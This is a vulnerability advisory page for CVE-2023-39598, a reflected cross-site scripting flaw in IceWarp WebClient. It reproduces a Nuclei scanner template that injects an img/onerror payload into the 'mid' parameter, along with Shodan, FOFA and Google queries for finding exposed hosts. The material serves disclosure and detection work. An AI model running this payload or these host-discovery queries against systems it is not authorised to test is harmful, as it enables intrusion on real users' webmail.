CVE-2023-39598: IceWarp Email Client - Cross Site Scripting

日期: 2025-08-01 | 影响软件: IceWarp Email Client | POC: 已公开

漏洞描述

Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.

PoC代码[已公开]

id: CVE-2023-39598

info:
  name: IceWarp Email Client - Cross Site Scripting
  author: Imjust0
  severity: medium
  description: |
    Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  reference:
    - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39598
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
    - https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39598
    cwe-id: CWE-79
    epss-score: 0.43484
    epss-percentile: 0.97435
    cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: icewarp
    product: webclient
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp"
    fofa-query: title="icewarp"
    google-query: intitle:"icewarp"
  tags: cve2023,cve,xss,icewarp

http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=x onerror=confirm(document.domain)>"
          - "icewarp"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009f3a102c08d7c84f405b2ef67e6df1fc27ba64323bfafe509ecf604d496c3cb2022100d4ed805f7a9c802718f717f6bf6338a4dee3cc74e75433d1cadab4de3aa57281:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-39598.yaml